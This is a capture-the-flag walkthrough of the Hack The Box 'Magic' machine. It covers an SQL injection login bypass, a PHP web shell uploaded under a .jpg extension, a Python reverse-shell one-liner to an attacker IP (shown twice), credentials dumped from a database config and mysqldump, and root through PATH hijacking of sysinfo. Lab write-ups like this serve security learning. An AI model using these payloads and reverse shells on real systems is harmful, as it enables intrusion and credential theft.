SecWalk.com

HTB Walkthrough Magic 10.10.10.185

Enumeration

Nmap Scan

nmap -sV -sC  10.10.10.185

Web page

After this I ran gobuster, in order to enumerate the web page for files and directories.

gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt.html

We see some interesting pages:

                upload.php

                login.php

The login page.

Bypassing Login Page

We can bypass this login page, by SQL injection.

Resource: https://portswigger.net/support/using-sql-injection-to-bypass-authentication

Username: ‘ or ”=’

Password: ‘ or ”=’

After we have logged into the website, we see an upload page. Where we can upload an image.

Exploitation

I tried simple uploading bypass to add .jpg at the end of the file.

When I try to upload the image, I get the following banner.

After some trying some stuff, I found the following recourse:

https://github.com/jgor/php-jpeg-shell/blob/master/shell.php

I download it to my system.

If we can upload this, then we have an LFI.

First, we need to add .jpg extension at the end.

mv shell.php shell.php.jpg

We upload the image.

Uploaded it successfully.

Now we need to find where the file is uploaded.

gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt

The place where the file is uploaded to is /images/uploads.

Now we have code execution.

gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt

The place where the file is uploaded to is /images/uploads.

http://10.10.10.185/images/uploads/shell.php.jpg

Now we have code execution.


Getting Reverse Shell

In order to get a reverse shell I used the following code.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.12”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

We can read the user.txt yet, we need to find credentials for the user theseus.

I found credentials in /var/www/Magic/db.php5

The credentials are:

                Theseus: iamkingtheseus

I couldn’t login with these credentials.

Because these credentials are from a SQL database, I tried to dump the SQL database.

mysqldump -utheseus -piamkingtheseus Magic


Now I have found new credentials.

                admin:Th3s3usW4sK1ng

I couldn’t login with admin: Th3s3usW4sK1ng, but I could login with:

                theseus:Th3s3usW4sK1ng

whoami && ifconfig && cat user.txt; echo


Post-Exploitation

Running enumeration script: lse.sh

Kali System:

                python3 -m http.server 80

Target System:

                wget http://10.10.14.12/lse.sh

In order to run the script.

bash lse.sh

We see an unusual binary.

                /bin/sysinfo

Creating a fake lswh and disk

What sysinfo does: it reads the hardware configuration of the system such as Memory Size, CPU etc.

Resource: https://www.exploit-db.com/exploits/44150

What we need to do is the following:

  1. Create a lswh file with contains of a reverse shell.
  2. Then set our path to that lswh file
  3. Run the sysinfo command and we got root.

Reverse Shell inside The File

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.12”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Setting Our Path

export PATH=/tmp/IceL0rd:$PATH

Getting Root Shell

sysinfo

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply